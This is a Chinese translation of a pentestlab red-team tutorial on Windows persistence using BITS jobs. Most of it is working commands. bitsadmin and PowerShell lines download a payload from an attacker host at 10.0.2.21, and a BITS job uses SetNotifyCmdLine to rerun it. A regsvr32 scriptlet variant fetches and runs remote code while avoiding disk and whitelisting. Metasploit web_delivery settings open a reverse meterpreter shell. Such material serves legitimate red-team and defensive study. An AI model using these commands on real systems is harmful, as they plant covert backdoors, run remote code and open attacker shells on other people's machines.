Window權限維持(六):BITS Jobs


Windows操作系統包含各種實用程序,系統管理員可以使用它們來執行各種任務。這些實用程序之一是后台智能傳輸服務(BITS),它可以促進文件到Web服務器(HTTP)和共享文件夾(SMB)的傳輸能力。Microsoft提供了一個名為“ bitsadmin ” 的二進制文件和PowerShell cmdlet,用於創建和管理文件傳輸。
從攻擊的角度來看,可以濫用此功能,以便在受感染的主機上下載有效負載(可執行文件,PowerShell腳本,Scriptlet等)並在給定時間執行這些文件,以在紅隊操作中保持持久性。但是,與“ bitsadmin ” 進行交互需要管理員級別的權限。執行以下命令會將惡意有效負載從遠程位置下載到本地目錄。

bitsadmin /transfer backdoor /download /priority high http://10.0.2.21/pentestlab.exe C:\tmp\pentestlab.exe

 Bitsadmin –文件傳輸

還有一個PowerShell cmdlet可以執行相同的任務。

Start-BitsTransfer -Source "http://10.0.2.21/pentestlab.exe" -Destination "C:\tmp\pentestlab.exe"


 BitsTrasfer –傳輸文件PowerShell

將文件放入磁盤后,可以通過從“ bitsadmin ”實用程序執行以下命令來實現持久性。用法非常簡單:

  1. 創建參數需要作業的名稱
  2. addfile需要文件的遠程位置和本地路徑
  3. SetNotifyCmdLine將執行的命令
  4. 所述SetMinRetryDelay定義時間回調(秒)
  5. 簡歷參數將運行位工作。
bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe"  "C:\tmp\pentestlab.exe"
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor


 持久性—BITS Jobs

當作業在系統上運行時,有效負載將被執行,Meterpreter會話將打開,或者通信將被接收回命令和控制(取決於場合中使用的C2)。

 持久性– BITS Jobs Meterpreter

參數SetNotifyCmdLine也可以用於通過regsvr32實用程序從遠程位置執行scriptlet 。這種方法的好處是它不會接觸磁盤,並且可以避開將應用程序列入白名單的產品。

bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.0.2.21:8080/FHXSd9.sct scrobj.dll"
bitsadmin /resume backdoor


 BITS Jobs – Regsvr32

Metasploit框架可用於通過Web交付模塊捕獲有效負載。

use exploit/multi/script/web_delivery
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.2.21
exploit

BITS Jobs – Regsvr32

譯文聲明:本文由Bypass整理並翻譯,僅用於安全研究和學習之用。

原文地址:https://pentestlab.blog/2019/10/30/persistence-bits-jobs/


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM